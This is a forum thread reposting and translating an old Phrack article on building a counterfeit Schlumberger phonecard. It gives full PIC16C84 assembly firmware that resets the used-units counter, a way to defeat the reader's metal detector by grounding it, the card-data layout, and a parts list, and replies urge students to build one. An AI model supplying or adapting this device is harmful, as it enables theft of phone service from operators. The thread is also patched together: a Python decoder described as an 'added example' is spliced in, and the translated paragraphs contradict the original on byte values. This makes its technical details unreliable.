CRD_DTA equ     0               ; RA0 = Card Data Output
CRD_RST equ     1               ; RB1 = Card Reset, Low-Active
CRD_WE  equ     7               ; RB7 = Card Write-Enable, Hi-Active

; PIC16C84 RAM Register Assignments

CRD_ID  equ     0x00c           ; Smartcard ID, 12 bytes
FUSCNT  equ     0x018           ; Fused units counter
BITCNT  equ     0x019           ; Bitcounter
LOOPCNT equ     0x01a           ; Loop Counter
EE_FLAG equ     0x01b           ; EEPROM Write Flag
TEMP1   equ     0x01c           ; Temporary Storage #1
TEMP2   equ     0x01d           ; Temporary Storage #2
TEMP3   equ     0x01e           ; Temporary Storage #3
TEMP4   equ     0x01f           ; Temporary Storage #4
TEMP_W  equ     0x02e           ; Temporary W Save Address
TEMP_S  equ     0x02f           ; Temporary STATUS Save Address

        org     0x2000          ; Chip ID Data
        dw      042,042,042,042

        org     0x2007          ; Configuration Fuses
        dw      B'00000001'

        org     0x2100          ; Internal Data EEPROM Memory (Card ID!!!)
        db      0x081,0x042,0x000,0x011,0x022,0x033
        db      0x044,0x055,0x066,0x077,0x011,0x084
        db      0x002                   ; Default used up credits value

        org     PIC84                   ; Reset-vector
        goto    INIT                    ; Jump to initialization routine

        org     INTVEC                  ; Interrupt-vector
        push                            ; Save registers
        call    INTMAIN                 ; Call main interrupt routine
        pop                             ; Restore registers
        retfie                          ; return from interrupt & clear flag

        org     0x010                   ; Start address for init rout.

INIT    bsf     STATUS,RP0              ; Access register bank 1
        clrwdt                          ; Clear watchdog timer
        movlw   B'11101000'             ; OPTION reg. settings
        movwf   OPTION                  ; Store in OPTION register
        movlw   B'11111110'             ; Set PORT A Tristate Latches
        movwf   TRISA                   ; Store in PORT A tristate register
        movlw   B'11111111'             ; Set PORT B Tristate Latches
        movwf   TRISB                   ; Store in PORT B tristate register
        bcf     STATUS,RP0              ; Access register bank 0
        clrf    RTCC                    ; Clear RTCC
        clrf    PORTA                   ; Clear PORTA
        clrf    PORTB                   ; Clear PORTB
        movlw   0d                      ; 13 bytes to copy
        movwf   LOOPCNT                 ; Store in LOOPCNT
        movlw   0c                      ; Start storing at $0c in RAM
        movwf   FSR                     ; Store in FSR
        clrf    EEADR                   ; Start at EEPROM Address 0

EECOPY  bsf     STATUS,RP0              ; Access register bank 1
        bsf     EECON1,RD               ; Set EECON1 Read Data Flag
        bcf     STATUS,RP0              ; Access register bank 0
        movfw   EEDATA                  ; Read one byte of EEPROM Data
        movwf   INDIR                   ; Store in RAM pointed at by FSR
        incf    FSR                     ; Increase FSR pointer
        incf    EEADR                   ; Increase EEPROM Address Pointer
        decfsz  LOOPCNT,1               ; Decrease LOOPCNT until it's 0
        goto    EECOPY                  ; Go and get some more bytes!

        bsf     STATUS,RP0              ; Access register bank 1
        bcf     EECON1,EEIF             ; Clear EEPROM Write Int. Flag
        bcf     EECON1,WREN             ; EEPROM Write Disable
        bcf     STATUS,RP0              ; Access register bank 0
        movlw   B'10010000'             ; Enable INT Interrupt
        movwf   INTCON                  ; Store in INTCON

MAIN    bsf     STATUS,RP0              ; Access register bank 1
        btfsc   EECON1,WR               ; Check if EEPROM Write Flag Set
        goto    MAIN                    ; Skip if EEPROM Write is Completed
        bcf     EECON1,EEIF             ; Reset Write Completion Flag
        bcf     EECON1,WREN             ; EEPROM Write Disable
        bcf     STATUS,RP0              ; Access register bank 0
        btfss   EE_FLAG,LSB             ; Check for EEPROM Write Flag
        goto    MAIN                    ; If not set, jump back and wait some more
        clrf    EE_FLAG                 ; Clear EEPROM Write Flag
        movlw   0c                      ; Units is stored in byte $0c
        movwf   EEADR                   ; Store in EEPROM Address Counter
        movfw   FUSCNT                  ; Get fused units counter
        movwf   EEDATA                  ; Store in EEDATA
        bsf     STATUS,RP0              ; Access register bank 1
        bsf     EECON1,WREN             ; EEPROM Write Enable
        bcf     INTCON,GIE              ; Disable all interrupts
        movlw   055                     ; Magic Number #1 for EEPROM Write
        movwf   EECON2                  ; Store in EECON2
        movlw   0aa                     ; Magic Number #2 for EEPROM Write
        movwf   EECON2                  ; Store in EECON2
        bsf     EECON1,WR               ; Execute EEPROM Write
        bsf     INTCON,GIE              ; Enable all interrupts again!
        bcf     STATUS,RP0              ; Access register bank 0
        goto    MAIN                    ; Program main loop!

INTMAIN btfsc   INTCON,INTF             ; Check for INT Interrupt
        goto    INTMAIN2                ; If set, jump to INTMAIN2
        movlw   B'00010000'             ; Enable INT Interrupt
        movwf   INTCON                  ; Store in INTCON
        return

INTMAIN2
        bcf     STATUS,RP0              ; Access register bank 0
        bsf     PORTA,CRD_DTA           ; Set Data Output High
        btfsc   PORTB,CRD_RST           ; Check if reset is low
        goto    NO_RST                  ; If not, skip reset sequence
        movfw   RTCC                    ; Get RTCC Value
        movwf   TEMP4                   ; Store in TEMP4
        clrf    RTCC                    ; Clear RTCC
        movlw   055                     ; Subtract $55 from TEMP4
        subwf   TEMP4,0                 ; to check for card reset....
        bnz     NO_RST2                 ; If not zero, jump to NO_RST2
        movlw   02                      ; Unused one has $02 in FUSCNT
        movwf   FUSCNT                  ; Store full value in FUSCNT
        bsf     EE_FLAG,LSB             ; Set EEPROM Write Flag
NO_RST2 bcf     INTCON,INTF             ; Clear INT Interrupt Flag
        return                          ; Mission Accomplished, return to sender

NO_RST  movfw   RTCC                    ; Get RTCC Value
        movwf   BITCNT                  ; Copy it to BITCNT
        movwf   TEMP1                   ; Copy it to TEMP1
        movwf   TEMP2                   ; Copy it to TEMP2
        movlw   060                     ; Load W with $60
        subwf   TEMP1,0                 ; Subtract $60 from TEMP1
        bz      CREDIT                  ; If it is equal to $60
        bc      CREDIT                  ; or greater, then skip to units area
        rrf     TEMP2                   ; Rotate TEMP2 one step right
        rrf     TEMP2                   ; Rotate TEMP2 one step right
        rrf     TEMP2                   ; Rotate TEMP2 one step right
        movlw   0f                      ; Load W with $f
        andwf   TEMP2,1                 ; And TEMP2 with W register
        movfw   TEMP2                   ; Load W with TEMP2
        addlw   0c                      ; Add W with $0c
        movwf   FSR                     ; Store data address in FSR
        movfw   INDIR                   ; Get data byte pointed at by FSR
        movwf   TEMP3                   ; Store it in TEMP3
        movlw   07                      ; Load W with $07
        andwf   TEMP1,1                 ; And TEMP1 with $07
        bz      NO_ROT                  ; If result is zero, skip shift loop
ROTLOOP rlf     TEMP3                   ; Shift TEMP3 one step left
        decfsz  TEMP1,1                 ; Decrement TEMP1 until zero
        goto    ROTLOOP                 ; If not zero, repeat until it is!
NO_ROT  btfss   TEMP3,MSB               ; Check if MSB of TEMP3 is set
        bcf     PORTA,CRD_DTA           ; Clear Data Output
        bcf     INTCON,INTF             ; Clear INT Interrupt Flag
        return                          ; Mission Accomplished, return to sender

CREDIT  btfss   PORTB,CRD_WE            ; Check if Card Write Enable is High
        goto    NO_WRT                  ; Abort write operation if not...
        btfss   PORTB,CRD_RST           ; Check if Card Reset is High
        goto    NO_WRT                  ; Abort write operation if not...
        incf    FUSCNT                  ; Increase used-up units counter
        bsf     EE_FLAG,LSB             ; Set EEPROM Write-Flag
        bcf     INTCON,INTF             ; Clear INT Interrupt Flag
        return                          ; Mission Accomplished, return to sender

NO_WRT  movlw   060                     ; Load W with $60
        subwf   BITCNT,1                ; Subtract $60 from BITCNT
        movfw   FUSCNT                  ; Load W with FUSCNT
        subwf   BITCNT,1                ; Subtract FUSCNT from BITCNT
        bnc     FUSED                   ; If result is negative, unit is fused
        bcf     PORTA,CRD_DTA           ; Clear Data Output
FUSED   bcf     INTCON,INTF             ; Clear INT Interrupt Flag
        return                          ; Mission Accomplished, return to sender

        END
==============================================================================
..
..
==============================================================================
; PIC16Cxx Micro-controller Include File

PIC54   equ     0x1ff           ; PIC16C54 Reset Vector
PIC55   equ     0x1ff           ; PIC16C55 Reset Vector
PIC56   equ     0x3ff           ; PIC16C56 Reset Vector
PIC57   equ     0x7ff           ; PIC16C57 Reset Vector
PIC71   equ     0x000           ; PIC16C71 Reset Vector
PIC84   equ     0x000           ; PIC16C84 Reset Vector
INTVEC  equ     0x004           ; PIC16C71/84 Interrupt Vector

INDIR   equ     0x000           ; Indirect File Reg Address Register
RTCC    equ     0x001           ; Real Time Clock Counter
PCL     equ     0x002           ; Program Counter Low Byte
STATUS  equ     0x003           ; Status Register
FSR     equ     0x004           ; File Select Register
PORTA   equ     0x005           ; Port A I/O Register
PORTB   equ     0x006           ; Port B I/O Register
PORTC   equ     0x007           ; Port C I/O Register
ADCON0  equ     0x008           ; PIC16C71 A/D Control Reg 0
ADRES   equ     0x009           ; PIC16C71 A/D Converter Result Register
EEDATA  equ     0x008           ; PIC16C84 EEPROM Data Register
EEADR   equ     0x009           ; PIC16C84 EEPROM Address Register
PCLATH  equ     0x00a           ; Program Counter High Bits
INTCON  equ     0x00b           ; Interrupt Control Register

TRISA   equ     0x005           ; Port A I/O Direction Register
TRISB   equ     0x006           ; Port B I/O Direction Register
TRISC   equ     0x007           ; Port C I/O Direction Register
ADCON1  equ     0x008           ; PIC16C71 A/D Control Reg 1
EECON1  equ     0x008           ; PIC16C84 EEPROM Control Reg. 1
EECON2  equ     0x009           ; PIC16C84 EEPROM Control Reg. 2
OPTION  equ     0x001           ; Option Register

MSB     equ     0x007           ; Most-Significant Bit
LSB     equ     0x000           ; Least-Significant Bit
TRUE    equ     1
YES     equ     1
FALSE   equ     0
NO      equ     0

; Status Register (f03) Bits

CARRY   equ     0x000           ; Carry Bit
C       equ     0x000           ; Carry Bit
DCARRY  equ     0x001           ; Digit Carry Bit
DC      equ     0x001           ; Digit Carry Bit
Z_BIT   equ     0x002           ; Zero Bit
Z       equ     0x002           ; Zero Bit
P_DOWN  equ     0x003           ; Power Down Bit
PD      equ     0x003           ; Power Down Bit
T_OUT   equ     0x004           ; Watchdog Time-Out Bit
TO      equ     0x004           ; Watchdog Time-Out Bit
RP0     equ     0x005           ; Register Page Select 0
RP1     equ     0x006           ; Register Page Select 1
IRP     equ     0x007           ; Indirect Addressing Reg. Page Sel.

; INTCON Register (f0b) Bits

RBIF    equ     0x000           ; RB Port change interrupt flag
INTF    equ     0x001           ; INT Interrupt Flag
RTIF    equ     0x002           ; RTCC Overflow Interrupt Flag
RBIE    equ     0x003           ; RB Port Ch. Interrupt Enable
INTE    equ     0x004           ; INT Interrupt Enable
RTIE    equ     0x005           ; RTCC Overflow Int. Enable
ADIE    equ     0x006           ; PIC16C71 A/D Int. Enable
EEIE    equ     0x006           ; PIC16C84 EEPROM Write Int. Enable
GIE     equ     0x007           ; Global Interrupt Enable

; OPTION Register (f81) Bits

PS0     equ     0x000           ; Prescaler Bit 0
PS1     equ     0x001           ; Prescaler Bit 1
PS2     equ     0x002           ; Prescaler Bit 2
PSA     equ     0x003           ; Prescaler Assignment Bit
RTE     equ     0x004           ; RTCC Signal Edge Select
RTS     equ     0x005           ; RTCC Signal Source Select
INTEDG  equ     0x006           ; Interrupt Edge Select
RBPU    equ     0x007           ; Port B Pull-up Enable

; ADCON0 Register (f08) Bits

ADON    equ     0x000           ; A/D Converter Power Switch
ADIF    equ     0x001           ; A/D Conversion Interrupt Flag
ADGO    equ     0x002           ; A/D Conversion Start Flag
CHS0    equ     0x003           ; A/D Converter Channel Select 0
CHS1    equ     0x004           ; A/D Converter Channel Select 1
ADCS0   equ     0x006           ; A/D Conversion Clock Select 0
ADCS1   equ     0x007           ; A/D Conversion Clock Select 1

; ADCON1 Register (f88) Bits

PCFG0   equ     0x000           ; RA0-RA3 Configuration Bit 0
PCFG1   equ     0x001           ; RA0-RA3 Configuration Bit 1

; EECON1 Register (f88) Bits

RD      equ     0x000           ; PIC16C84 EEPROM Read Data Flag
WR      equ     0x001           ; PIC16C84 EEPROM Write Data Flag
WREN    equ     0x002           ; PIC16C84 EEPROM Write Enable Flag
WRERR   equ     0x003           ; PIC16C84 EEPROM Write Error Flag
EEIF    equ     0x004           ; PIC16C84 EEPROM Interrupt Flag

; Some useful macros...

PUSH    macro
        movwf   TEMP_W
        swapf   STATUS,W
        movwf   TEMP_S
        endm

POP     macro
        swapf   TEMP_S,W
        movwf   STATUS
        swapf   TEMP_W
        swapf   TEMP_W,W
        endm

        END
==============================================================================
#4
Posted on: 2002-10-15 22:37
Re: Make your own "computer-lab card" (EE department, 3rd year and up)
The Security System:
~~~~~~~~~~~~~~~~~~~~

The security of the Schlumberger card system depends strongly on two things: the metal detector in the card reader which senses if there is any metal on the card where there shouldn't be any metal. Circuit traces on a home built card are definitely made of metal. So, we have to figure out a way of getting around this problem...

The security of Schlumberger's phone card system relies heavily on two things: the metal detector in the card reader, which checks whether there is metal on the parts of the card where there should be none. A homemade card, however, ends up with its circuit made of metal. So we have to find a way around this problem.

Well, that isn't really too hard! They made one really big mistake: If the metal detector is grounded, it doesn't work!! If you look at the printout of my layouts for this card you'll find one big area of the board that is rectangle shaped. In this area you should make a big blob of solder that is between 2-3 millimeters high (approximately!). When the card slides into the phone, the blob should be touching the metal detector and since the blob is connected to ground the detector is also being grounded.

This is actually not hard! They made one big mistake: when the metal detector is grounded, it stops working. If you look at the printout of the card layout, you will find a large rectangular area. On this area you should put a blob of solder roughly 2-3 millimeters thick. When the card slides into the phone, this blob touches the metal detector, and because the blob is grounded, the metal detector is grounded too.

The phone also counts the number of times the metal detector gets triggered by foreign objects in the card reader (Meaning that the phone company's security staff can see if someone's attempting to use a fake card that doesn't have this counter-measure on it!) and this is of course included in the daily service report the phone sends to the central computer.

The phone also records the number of times the metal detector is triggered by foreign objects (meaning that if someone tries to use a "black card" without this countermeasure, the phone company's security staff can find out). Of course all of this is included in the daily service report the phone sends to the central computer.

The second security lies in the card's first 12 bytes, it's not just what it appears to be: a serial number, it's more than that. Part of the first byte is a checksum of the number of 1's in the 11 bytes following it. Then byte 2 is always $83, identifying the card as an electronic phonecard. Byte 3 and 4 is the number of units on the card:

The second line of security lies in the card's first 12 bytes; it is not just what it looks like, a serial number, it is more than that. The first byte of some cards is a checksum of the 11 bytes following it, and the second byte is always $84, indicating that the card is an electronic phone card. Bytes 3 and 4 are the number of units on the card.

The first nibble of byte 3 is always $1 and then in the remaining three nibbles the number of units is stored in BCD code, for example $11,$22 means 120 units (Two units is always fused at the factory as a test, see the text by Stephane Bausson!) Then we have 4 bytes of card serial number data, 2 bytes of card checksum (calculated with a 16 bit key stored in the payphone's ROM), 1 byte that is always $11, and then at last, byte 12 which is the country identifier.

The first nibble of the third byte is always $1, and the remaining three nibbles hold the number of units in BCD. For example $11,$22 means 120 units (two units are always fused at the factory as a test; see the related article by Stephane Bausson). Then we have 4 bytes of card serial number data, 2 bytes of card checksum (computed with a 16-bit key stored in the phone's ROM), one byte that is always $11, and finally the twelfth byte, the country identifier.

The Parts Needed:
~~~~~~~~~~~~~~~~~

01 * PIC16C84, 4 MHz version, Surface Mounted (SOIC-18 Package)
01 * 4 MHz Ceramic Resonator, Surface Mounted
02 * 22 pF Capacitors, Surface Mounted (Size 1206).
01 * 0.8mm thick single sided circuit board with P20 photoresist

The Construction:
~~~~~~~~~~~~~~~~~

Since this project is obviously not intended for the novice in electronics I will not go into the basic details of soldering/etching circuit boards. If you do not know much of this, ask a friend who does for help. If you want to reach me for help, write to Phrack and ask them to forward the letter to me as I wish to remain anonymous - This project will probably upset a lot of phone companies and last but not least the guys at Schlumberger Tech.

Since this design is obviously not aimed at beginners in electronics, I will not explain in detail how to solder or make boards. If you really want to learn more about this sort of thing, find a friend to guide you. If you have questions for me, write to Phrack and ask them to forward it, because I wish to remain unknown. This design may well upset a lot of phone companies.
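The 12-byte header layout described in the post above, written out as a decoder for checking a dumped card image. This is an added example, not code from the Phrack article or from this thread; the byte positions follow the text ($83 type marker, $1 nibble plus three BCD nibbles of units, 4-byte serial, 2-byte checksum, constant $11, country byte). The first-byte "count of 1s" encoding and the 16-bit checksum key are not given on the page, so the code only reports the count of set bits and the raw checksum field; the big-endian reading of the checksum and the sample header are assumptions.

```python
# Added example: split a 12-byte card header into the fields described in the
# post and flag structural problems. Useful for validating dumps, not for
# producing cards. Assumptions (not from the page): the checksum bytes are read
# big-endian, and SAMPLE_HEADER is a constructed value, not a real card.

FACTORY_FUSED_UNITS = 2   # the text: two units are always fused at the factory


def count_ones(data: bytes) -> int:
    """Number of set bits across all bytes (what byte 1 is said to reflect)."""
    return sum(bin(b).count("1") for b in data)


def decode_units(b3: int, b4: int) -> int:
    """Decode the unit count held in bytes 3 and 4 ($1nnn, n = BCD digits).

    Raises ValueError on a wrong leading nibble or a non-BCD digit, so a
    corrupt or mis-read dump is reported instead of silently mis-counted.
    """
    nibbles = [b3 >> 4, b3 & 0xF, b4 >> 4, b4 & 0xF]
    if nibbles[0] != 0x1:
        raise ValueError(f"byte 3 high nibble is {nibbles[0]:#x}, expected 0x1")
    for n in nibbles[1:]:
        if n > 9:
            raise ValueError(f"non-BCD nibble {n:#x} in unit field")
    return nibbles[1] * 100 + nibbles[2] * 10 + nibbles[3]


def parse_card_header(header: bytes) -> dict:
    """Return the header fields plus a list of structural problems found."""
    if len(header) != 12:
        raise ValueError("header must be exactly 12 bytes")
    total_units = decode_units(header[2], header[3])
    problems = []
    if header[1] != 0x83:
        problems.append(f"byte 2 is {header[1]:#04x}, expected 0x83")
    if header[10] != 0x11:
        problems.append(f"byte 11 is {header[10]:#04x}, expected 0x11")
    return {
        "checksum_byte": header[0],
        "ones_in_tail": count_ones(header[1:]),
        "card_type_ok": header[1] == 0x83,
        "total_units": total_units,
        "usable_units": total_units - FACTORY_FUSED_UNITS,
        "serial": header[4:8].hex(),
        "card_checksum": int.from_bytes(header[8:10], "big"),  # assumed order
        "country": header[11],
        "problems": problems,
    }


# Constructed sample (not a real card): $11,$22 is the post's own example unit
# field; the serial, checksum and country bytes are made up.
SAMPLE_HEADER = bytes([0x00, 0x83, 0x11, 0x22, 0x12, 0x34, 0x56, 0x78,
                       0xAB, 0xCD, 0x11, 0x84])

if __name__ == "__main__":
    for key, value in parse_card_header(SAMPLE_HEADER).items():
        print(f"{key:>14}: {value}")
```

Run as a script it prints the decoded fields of the constructed header; with a real dump, a non-empty `problems` list or a `ValueError` from `decode_units` is the signal that the image does not match the layout the post describes.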
#5
Posted on: 2002-10-15 22:41
Re: Make your own "computer-lab card" (EE department, 3rd year and up)
A few days ago, while wandering around various BBSes, I found this article; unfortunately it was in English and very hard to read. Later on the Chengdu University of Technology BBS I found a translation posted by a fellow student. I was very grateful, but for some reason it was cut off halfway, which annoyed me even more, so I simply spent an afternoon translating the whole document. This is the first time I have done this kind of work, and in many places I don't know whether the translation is right, so I made it English-Chinese parallel; if you find the Chinese hard going, my translation is probably off, so take the extra effort and read the English original.

The first part is the one I saw at Chengdu University of Technology; everything after that is my translation. Throw whatever bricks you have.

I think EE students should take a look; after all, it is all stuff we have studied: microcomputer interfacing, assembly language, and programming languages. They may seem simple and old, but they are the foundation. And the school rarely gives us real hands-on projects; the one design we do get, a sheet counter, is copied from one year to the next. Have a look at something fresh and give it a try. OK??

--------------------
"Man is a fragile reed, but a thinking reed." A person who does not think is one more fool in the world; a nation that does not think heads toward madness. Thought is a right people are born with; although it does not necessarily lead to truth, not thinking necessarily leads to ignorance and blind obedience. Therefore depriving people of the right to think is a crime.
#6
Posted on: 2002-10-16 10:17
Re: Make your own "computer-lab card" (EE department, 3rd year and up)
Too long! Too much trouble!
--------------------
"Where there is feeling, seeds are sown, and on that ground fruit grows; without feeling there is no seed, without nature there is no birth." ------- Head of the "Sleep Sect"!
#7
Posted on: 2002-10-19 12:40
Re: Make your own "computer-lab card" (EE department, 3rd year and up)
Our department ought to be like this; you can hand it to your microcomputer teacher, let him go first and me after; that is the proper "style" for a student!!! You can certainly make it yourself; some people in our Electronics Science and Technology Association can help you!!!???
--------------------